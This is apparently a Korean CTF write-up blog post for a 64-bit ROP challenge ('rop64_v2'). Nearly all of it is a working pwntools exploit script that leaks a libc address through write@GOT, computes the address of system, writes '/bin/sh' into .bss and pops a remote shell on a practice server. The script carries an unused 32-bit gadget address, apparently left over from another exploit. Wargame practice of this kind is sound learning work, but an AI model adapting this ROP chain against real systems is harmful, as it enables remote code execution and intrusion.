64비트로 바뀌었습니다.
from pwn import *
context.log_level = 'debug'
e = ELF('./rop64_v2')
p = remote("sunrin.site", 9007)
libc = ELF('./libc.so.6')
prdi = 0x00000000004005f3
prsir15 = 0x00000000004005f1
pppret = 0x080486b9
payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(1)
payload += p64(prsir15)
payload += p64(e.got['write'])
payload += 'A' * 8
payload += p64(e.plt['write'])
payload += p64(e.sym['main'])
p.sendlineafter("World\n", payload)
_write = u64(p.recvuntil('\x7f').ljust(8, '\x00'))
base = _write - libc.symbols['write']
system = base + libc.sym['system']
binsh = e.bss() + 0x10
payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(0)
payload += p64(prsir15)
payload += p64(binsh)
payload += 'A' * 8
payload += p64(e.plt['read'])
payload += p64(e.sym['main'])
p.sendline(payload)
p.sendline('/bin/sh\x00')
payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(binsh)
payload += p64(system)
p.sendline(payload)
p.interactive()728x90
'해킹 > writeup' 카테고리의 다른 글
| 21. format string bug - prob1 (0) | 2021.08.01 |
|---|---|
| 20. sung.pw - BaskinRobins31 (0) | 2021.08.01 |
| 18. sung.pw - ropasaurusrex (0) | 2021.08.01 |
| 17. sung.pw - rop32_v2 (0) | 2021.08.01 |
| 16. sung.pw - rop32 (0) | 2021.08.01 |